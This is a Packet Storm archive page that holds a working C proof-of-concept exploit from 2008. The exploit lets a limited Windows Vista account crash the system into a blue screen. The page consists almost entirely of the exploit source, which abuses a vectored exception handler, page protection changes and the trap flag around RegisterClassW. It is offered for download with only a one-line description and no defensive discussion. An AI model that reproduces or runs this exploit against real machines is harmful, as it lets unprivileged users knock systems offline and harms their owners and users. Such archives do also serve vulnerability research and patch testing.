exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vista-access.txt

vista-access.txt
Posted Oct 6, 2008
Authored by Defsanguje

Microsoft Windows Vista access violation from limited account denial of service blue screen of death exploit.

tags | exploit, denial of service
systems | windows
SHA-256 | c1f3a692fc163324f440f798f6db2fa7d92396e6f59f7ed7e36df7e9ad735baf

vista-access.txt

Change Mirror Download
// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008 //
/////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>

WCHAR szClass[] = L"BSODClass";

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;

typedef struct
{
DWORD dwWriteViolation;
LPVOID lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;

int main()
{
WNDCLASSW wc;
DWORD dwOldProt;

printf("Windows Vista BSoD from usermode/limited account.\n"
"Coded by. Defsanguje - October 05 2008\n");

// Setup vectored exception handler. SEH would work also.
pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"),
"RtlAddVectoredExceptionHandler");
(*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

// Dummy data
wc.style = 0;
wc.lpfnWndProc = NULL;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = GetModuleHandle(NULL);
wc.hIcon = NULL;
wc.hCursor = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
wc.lpszMenuName = NULL;
wc.lpszClassName = szClass;

VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
RegisterClassW(&wc);

printf("You shouldn't see this");
return 0;
}

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
static LPVOID lpLastAddress;
static DWORD dwOldProt;
EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;
switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
{
case EXCEPTION_ACCESS_VIOLATION:
avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);
lpLastAddress = avParams->lpAddress;

// Set trap flag
lpExceptionInfo->ContextRecord->EFlags |= 0x100;
break;
case STATUS_SINGLE_STEP:
VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
break;
default:
break;
}
return EXCEPTION_CONTINUE_EXECUTION;
;
}

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close